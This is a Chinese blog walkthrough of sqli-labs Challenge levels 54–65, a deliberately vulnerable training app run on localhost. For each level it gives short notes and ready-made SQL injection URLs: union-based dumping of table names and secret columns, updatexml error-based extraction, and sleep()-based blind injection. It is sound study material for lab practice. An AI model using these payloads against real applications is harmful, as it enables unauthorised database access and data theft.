sqli-labs闯关笔记(Challenges)

sqli-labs项目地址:https://github.com/Audi-1/sqli-labs

文章目录

      • Less-54
      • Less-55
      • Less-56
      • Less-57
      • Less-58
      • Less-59
      • Less-60
      • Less-61
      • Less-62
      • Less-63
      • Less-64
      • Less-65

正文

Less-54

sqli-labs闯关笔记(Challenges)_第1张图片
sqli-labs闯关笔记(Challenges)_第2张图片
注入方法和第一关没啥区别,但是做了一个sql查询次数,在表中tryy每查询一次会+1,达到10次重置表名和字段名
sqli-labs闯关笔记(Challenges)_第3张图片
但是10次好像没啥影响吧,把过程写一下:

http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,user(),database()--+

http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='d5fxsrk9r0'--+

http://127.0.0.1/sqli-labs/Less-54/?id=-1'union select 1,2,group_concat(id,0x7e,sessid,0x7e,secret_ZB6W,0x7e,tryy) from challenges.d5fxsrk9r0--+

Less-55

sqli-labs闯关笔记(Challenges)_第4张图片
sqli-labs闯关笔记(Challenges)_第5张图片
和上一关没啥区别,改了参数包裹方式和变成了14次上线提交次数

http://127.0.0.1/sqli-labs/Less-55/?id=-1)union select 1,database(),user()--+

后面的姿势就不赘述了

Less-56

sqli-labs闯关笔记(Challenges)_第6张图片
sqli-labs闯关笔记(Challenges)_第7张图片
还是只改了参数包裹方式,闭合即可

http://127.0.0.1/sqli-labs/Less-56/?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

Less-57

sqli-labs闯关笔记(Challenges)_第8张图片
sqli-labs闯关笔记(Challenges)_第9张图片
还是只改了参数包裹方式,姿势还是老样子

http://127.0.0.1/sqli-labs/Less-57/?id=-1"union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

Less-58

sqli-labs闯关笔记(Challenges)_第10张图片
sqli-labs闯关笔记(Challenges)_第11张图片
没有回显数据库中执行的结果,而是回显设置好的结果,所以想联合查询把数据通过正常回显出来是不行的,有报错可以使用报错注入

http://127.0.0.1/sqli-labs/Less-58/?id=-1'union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+

Less-59

sqli-labs闯关笔记(Challenges)_第12张图片
sqli-labs闯关笔记(Challenges)_第13张图片
和上一关一样只是,只是不用闭合了,直接插入,还是使用报错注入

http://127.0.0.1/sqli-labs/Less-59/?id=-1 union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+

Less-60

sqli-labs闯关笔记(Challenges)_第14张图片
sqli-labs闯关笔记(Challenges)_第15张图片
("$id"),闭合即可,还是使用报错注入

http://127.0.0.1/sqli-labs/Less-60/?id=-1")union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+

Less-61

sqli-labs闯关笔记(Challenges)_第16张图片
sqli-labs闯关笔记(Challenges)_第17张图片
(''$id'')

http://127.0.0.1/sqli-labs/Less-61/?id=-1'))union select 1,2,updatexml(0x7e,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),0x7e)--+

Less-62

sqli-labs闯关笔记(Challenges)_第18张图片
sqli-labs闯关笔记(Challenges)_第19张图片
没有数据回显,也不输出报错信息,只能盲注了

http://127.0.0.1/sqli-labs/Less-62/?id=1') and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+

Less-63

sqli-labs闯关笔记(Challenges)_第20张图片
sqli-labs闯关笔记(Challenges)_第21张图片
还是使用盲注

http://127.0.0.1/sqli-labs/Less-63/?id=1'and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+

Less-64

sqli-labs闯关笔记(Challenges)_第22张图片
sqli-labs闯关笔记(Challenges)_第23张图片
http://127.0.0.1/sqli-labs/Less-64/?id=1))and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+

Less-65

sqli-labs闯关笔记(Challenges)_第24张图片
sqli-labs闯关笔记(Challenges)_第25张图片
http://127.0.0.1/sqli-labs/Less-65/?id=1") and if(ascii(substr(database(),1,1))=99,sleep(3),1)--+

你可能感兴趣的:(Web,Security,sql-labs)